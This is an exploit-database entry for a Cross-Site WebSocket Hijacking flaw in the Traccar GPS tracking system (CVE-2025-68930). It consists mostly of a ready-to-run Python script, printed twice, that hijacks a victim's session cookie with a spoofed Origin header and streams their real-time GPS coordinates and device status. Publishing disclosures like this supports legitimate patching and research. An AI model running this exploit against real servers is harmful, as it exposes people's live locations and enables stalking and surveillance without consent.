7.1
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
Description
Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking CSWSH Date: 2026-02-26 Exploit Author: Hazar Taspinar Vendor Homepage: https://www.traccar.org/ Software Link: https://github.com/traccar/traccar Version: = 6.11.1...
Basic Information
ID
EDB-ID:52545
Published
May 4, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930
"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket).
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header
along with a victim's valid JSESSIONID. This allows the attacker to hijack the
WebSocket connection and leak real-time sensitive data, including GPS coordinates
and device status.
Requirements:
pip install websocket-client
"""
import websocket
import argparse
import sys
def on_message(ws, message):
print(f"[+] DATA LEAKED: {message}")
def on_error(ws, error):
print(f"[-] Error: {error}")
def on_close(ws, close_status_code, close_msg):
print("[-] Connection closed.")
def on_open(ws):
print("[*] WebSocket Handshake Successful!")
print("[*] Connection upgraded. Streaming real-time sensitive data...\n")
def main():
parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")
args = parser.parse_args()
# Construct the WebSocket URL
url = f"ws://{args.target}:{args.port}/api/socket"
# Malicious headers triggering the bypass
# The 'Origin' header is set to an external domain to demonstrate lack of validation.
headers = [
"Origin: http://hacker.com",
f"Cookie: JSESSIONID={args.cookie}"
]
print(f"""
================================================
TRACCAR GPS TRACKER - CSWSH EXPLOIT
Exploit Author: Hazar Taspinar
CVE: CVE-2025-68930
Target: {url}
================================================
""")
# Initiate WebSocket connection
ws = websocket.WebSocketApp(url,
on_message=on_message,
on_error=on_error,
on_close=on_close,
on_open=on_open,
header=headers)
try:
ws.run_forever()
except KeyboardInterrupt:
print("\n[*] Exploit stopped by user.")
sys.exit(0)
if __name__ == "__main__":
main()
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930
"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket).
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header
along with a victim's valid JSESSIONID. This allows the attacker to hijack the
WebSocket connection and leak real-time sensitive data, including GPS coordinates
and device status.
Requirements:
pip install websocket-client
"""
import websocket
import argparse
import sys
def on_message(ws, message):
print(f"[+] DATA LEAKED: {message}")
def on_error(ws, error):
print(f"[-] Error: {error}")
def on_close(ws, close_status_code, close_msg):
print("[-] Connection closed.")
def on_open(ws):
print("[*] WebSocket Handshake Successful!")
print("[*] Connection upgraded. Streaming real-time sensitive data...\n")
def main():
parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")
args = parser.parse_args()
# Construct the WebSocket URL
url = f"ws://{args.target}:{args.port}/api/socket"
# Malicious headers triggering the bypass
# The 'Origin' header is set to an external domain to demonstrate lack of validation.
headers = [
"Origin: http://hacker.com",
f"Cookie: JSESSIONID={args.cookie}"
]
print(f"""
================================================
TRACCAR GPS TRACKER - CSWSH EXPLOIT
Exploit Author: Hazar Taspinar
CVE: CVE-2025-68930
Target: {url}
================================================
""")
# Initiate WebSocket connection
ws = websocket.WebSocketApp(url,
on_message=on_message,
on_error=on_error,
on_close=on_close,
on_open=on_open,
header=headers)
try:
ws.run_forever()
except KeyboardInterrupt:
print("\n[*] Exploit stopped by user.")
sys.exit(0)
if __name__ == "__main__":
main()